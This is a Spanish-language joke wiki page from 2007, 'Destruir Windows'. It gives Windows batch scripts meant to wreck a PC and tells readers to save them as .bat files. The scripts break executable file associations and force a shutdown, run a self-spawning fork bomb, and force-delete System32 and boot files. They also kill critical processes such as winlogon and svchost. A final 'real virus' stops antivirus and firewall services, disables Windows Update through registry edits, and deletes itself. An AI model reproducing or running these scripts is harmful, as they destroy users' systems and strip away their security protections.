Destruir Windows

From Speeslasopedia

Revision as of 14:17, 25 November 2007 by Admin (Talk | contribs)

Image:Dos.pngLas formas más fáciles de destruir Windows es con CMD.exe. Aquí algunas maneras.Image:Dos.png
Pero antes, abre el bloc de notas y escribe el código, luego guardalo como <nombre>.bat.

Contents

Manera Nº1: Con el comando assoc

@echo off
assoc .exe=nothing
assoc .bat=nothing
assoc .inf=nothing
assoc .ini=nothing
shutdown /s /t 000 /f

Manera Profesional

@echo off
title Jode PCs jeje
color 0a
echo jodiendo...
assoc .exe=nothing
assoc .bat=nothing
assoc .inf=nothing
assoc .ini=nothing
echo PC jodido correctamente
shutdown /s /t 000 /f
Exit

Manera Nº2: Con el comando start

@echo off

<nombre>

start %0
goto <nombre>

Manera Nº3: Con el comando del

@echo off
del /F /Q C:\\WINDOWS\\System32
del /F /Q C:\\Archivos de programa
del /F /Q C:\\WINDOWS\\
del /F /Q ntoskrnl.dll
del /F /Q shell32.dll
del /F /Q boot.ini
del /F /Q command.com
del /F /Q C:\\NTDETECT.COM shutdown -s -t 00

Manera Nº4: Con el comando taskkill

@echo off taskkill /F /IM explorer.exe
taskkill /F /IM msnmsgr.exe
taskkill /F /IM iexplore.exe
taskkill /F /IM firefox.exe
taskkill /F /IM rundll32.exe
taskkill /F /IM winlogon.exe
taskkill /F /IM ares.exe
taskkill /F /IM emule.exe
taskkill /F /IM firewall.exe
taskkill /F /IM taskmgr.exe
taskkill /F /IM cmd.exe
taskkill /F /IM notepad.exe
taskkill /F /IM write.exe
taskkill /F /IM mspaint.exe
taskkill /F /IM wgatray.exe
taskkill /F /IM svchost.exe

Manera Nº5: Con este virus real

@echo off"
net stop "Security Center"
net stop "IPSEC Policy Agent"
net stop "kavsvc"
net stop McAfeeFramework
net stop inoRT
net stop NOD32krn
net stop PolicyAgent
net stop navapsvc
net stop NSCService
net stop SAVScan
net stop "Symantec Core LC"
net stop ccEvtMgr
net stop ccISPwdSvc
net stop SNDSrvc
net stop ccProxy
net stop ccSetMgr
net stop SPBBCSvc
net stop ntrtscan
net stop OfcPfwSvc
net stop tmlisten
net stop ISSVC
net stop SNDSrvc
net stop SWEEPSRV.SYS
net stop FSDFWD
net stop "BackWeb Plug-in - 7681197"
net stop FSMA
net stop McShield
net stop winvnc4
Echo REGEDIT4>%temp%\\1.reg
Echo.>>%temp%\\1.reg
Echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\NetBT\\Parameters]>>%temp%\\1.reg
Echo "TransportBindName"="">>%temp%\\1.reg
Echo.>>%temp%\\1.reg
Echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]>>%temp%\\1.reg
Echo "Start"=dword:00000004>>%temp%\\1.reg
Echo.>>%temp%\\1.reg
Echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]>>%temp%\\1.reg
Echo "Start"=dword:00000004>>%temp%\\1.reg
Echo.>>%temp%\\1.reg
Echo [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]>>%temp%\\1.reg
Echo "Start"=dword:00000004>>%temp%\\1.reg
Echo.>>%temp%\\1.reg
Echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole]>>%temp%\\1.reg
Echo "EnableDCOM"="N">>%temp%\\1.reg
Echo "EnableRemoteConnect"="N">>%temp%\\1.reg
Echo.>>%temp%\\1.reg
Echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa]>>%temp%\\1.reg
Echo "restrictanonymous"=dword:00000001>>%temp%\\1.reg
Echo.>>%temp%\\1.reg
Echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\PCT1.0\\Server]>>%temp%\\1.reg
Echo "Enabled"=hex:00>>%temp%\\1.reg
Echo.>>%temp%\\1.reg
Echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters]>>%temp%\\1.reg
Echo "AutoShareWks"=dword:00000000>>%temp%\\1.reg
Echo "AutoShareServer"=dword:00000000>>%temp%\\1.reg
Echo.>>%temp%\\1.reg
Echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters]>>%temp%\\1.reg
Echo "NameServer"="">>%temp%\\1.reg
Echo "ForwardBroadcasts"=dword:00000000>>%temp%\\1.reg
Echo "IPEnableRouter"=dword:00000000>>%temp%\\1.reg
Echo "Domain"="">>%temp%\\1.reg
Echo "SearchList"="">>%temp%\\1.reg
Echo "UseDomainNameDevolution"=dword:00000001>>%temp%\\1.reg
Echo "EnableICMPRedirect"=dword:00000000>>%temp%\\1.reg
Echo "DeadGWDetectDefault"=dword:00000001>>%temp%\\1.reg
Echo "DontAddDefaultGatewayDefault"=dword:00000000>>%temp%\\1.reg
Echo "EnableSecurityFilters"=dword:00000001>>%temp%\\1.reg
Echo "AllowUnqualifiedQuery"=dword:00000000>>%temp%\\1.reg
Echo "PrioritizeRecordData"=dword:00000001>>%temp%\\1.reg
Echo "TCP1320Opts"=dword:00000003>>%temp%\\1.reg
Echo "KeepAliveTime"=dword:00023280>>%temp%\\1.reg
Echo "BcastQueryTimeout"=dword:000002ee>>%temp%\\1.reg
Echo "BcastNameQueryCount"=dword:00000001>>%temp%\\1.reg
Echo "CacheTimeout"=dword:0000ea60>>%temp%\\1.reg
Echo "Size/Small/Medium/Large"=dword:00000003>>%temp%\\1.reg
Echo "LargeBufferSize"=dword:00001000>>%temp%\\1.reg
Echo "SynAckProtect"=dword:00000002>>%temp%\\1.reg
Echo "PerformRouterDiscovery"=dword:00000000>>%temp%\\1.reg
Echo "EnablePMTUBHDetect"=dword:00000000>>%temp%\\1.reg
Echo "FastSendDatagramThreshold "=dword:00000400>>%temp%\\1.reg
Echo "StandardAddressLength "=dword:00000018>>%temp%\\1.reg
Echo "DefaultReceiveWindow "=dword:00004000>>%temp%\\1.reg
Echo "DefaultSendWindow"=dword:00004000>>%temp%\\1.reg
Echo "BufferMultiplier"=dword:00000200>>%temp%\\1.reg
Echo "PriorityBoost"=dword:00000002>>%temp%\\1.reg
Echo "IrpStackSize"=dword:00000004>>%temp%\\1.reg
Echo "IgnorePushBitOnReceives"=dword:00000000>>%temp%\\1.reg
Echo "DisableAddressSharing"=dword:00000000>>%temp%\\1.reg
Echo "AllowUserRawAccess"=dword:00000000>>%temp%\\1.reg
Echo "DisableRawSecurity"=dword:00000000>>%temp%\\1.reg
Echo "DynamicBacklogGrowthDelta"=dword:00000032>>%temp%\\1.reg
Echo "FastCopyReceiveThreshold"=dword:00000400>>%temp%\\1.reg
Echo "LargeBufferListDepth"=dword:0000000a>>%temp%\\1.reg
Echo "MaxActiveTransmitFileCount"=dword:00000002>>%temp%\\1.reg
Echo "MaxFastTransmit"=dword:00000040>>%temp%\\1.reg
Echo "OverheadChargeGranularity"=dword:00000001>>%temp%\\1.reg
Echo "SmallBufferListDepth"=dword:00000020>>%temp%\\1.reg
Echo "SmallerBufferSize"=dword:00000080>>%temp%\\1.reg
Echo "TransmitWorker"=dword:00000020>>%temp%\\1.reg
Echo "DNSQueryTimeouts" =hex(7):31,00,00,00,32,00,00,00,32,00,00,00,34,00,00,00,38,00,00,00,30,00,00,00,00,00>>%temp%\\1.reg
Echo "DefaultRegistrationTTL"=dword:00000014>>%temp%\\1.reg
Echo "DisableReplaceAddressesInConflicts"=dword:00000000>>%temp%\\1.reg
Echo "DisableReverseAddressRegistrations"=dword:00000001>>%temp%\\1.reg
Echo "UpdateSecurityLevel "=dword:00000000>>%temp%\\1.reg
Echo "DisjointNameSpace"=dword:00000001>>%temp%\\1.reg
Echo "QueryIpMatching"=dword:00000000>>%temp%\\1.reg
Echo "NoNameReleaseOnDemand"=dword:00000001>>%temp%\\1.reg
Echo "EnableDeadGWDetect"=dword:00000000>>%temp%\\1.reg
Echo "EnableFastRouteLookup"=dword:00000001>>%temp%\\1.reg
Echo "MaxFreeTcbs"=dword:000007d0>>%temp%\\1.reg
Echo "MaxHashTableSize"=dword:00000800>>%temp%\\1.reg
Echo "SackOpts"=dword:00000001>>%temp%\\1.reg
Echo "Tcp1323Opts"=dword:00000003>>%temp%\\1.reg
Echo "TcpMaxDupAcks"=dword:00000001>>%temp%\\1.reg
Echo "TcpRecvSegmentSize"=dword:00000585>>%temp%\\1.reg
Echo "TcpSendSegmentSize"=dword:00000585>>%temp%\\1.reg
Echo "TcpWindowSize"=dword:0007d200>>%temp%\\1.reg
Echo "DefaultTTL"=dword:00000030>>%temp%\\1.reg
Echo "TcpMaxHalfOpen"=dword:0000004b>>%temp%\\1.reg
Echo "TcpMaxHalfOpenRetried"=dword:00000050>>%temp%\\1.reg
Echo "TcpTimedWaitDelay"=dword:00000000>>%temp%\\1.reg
Echo "MaxNormLookupMemory"=dword:00030d40>>%temp%\\1.reg
Echo "FFPControlFlags"=dword:00000001>>%temp%\\1.reg
Echo "FFPFastForwardingCacheSize"=dword:00030d40>>%temp%\\1.reg
Echo "MaxForwardBufferMemory"=dword:00019df7>>%temp%\\1.reg
Echo "MaxFreeTWTcbs"=dword:000007d0>>%temp%\\1.reg
Echo "GlobalMaxTcpWindowSize"=dword:0007d200>>%temp%\\1.reg
Echo "EnablePMTUDiscovery"=dword:00000001>>%temp%\\1.reg
Echo "ForwardBufferMemory"=dword:00019df7>>%temp%\\1.reg
Echo.>>%temp%\\1.reg
Echo [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]>>%temp%\\1.reg
Echo "MaxConnectionsPer1_0Server"=dword:00000050>>%temp%\\1.reg
Echo "MaxConnectionsPerServer"=dword:00000050>>%temp%\\1.reg
Echo.>>%temp%\\1.reg
START /WAIT REGEDIT /S %temp%\\1.reg
DEL %temp%\\1.reg
DEL %0
(Este virus desactiva varios antivirus y crea cosas en el registro)
Usese bajo su propia responsabilidad

Personal tools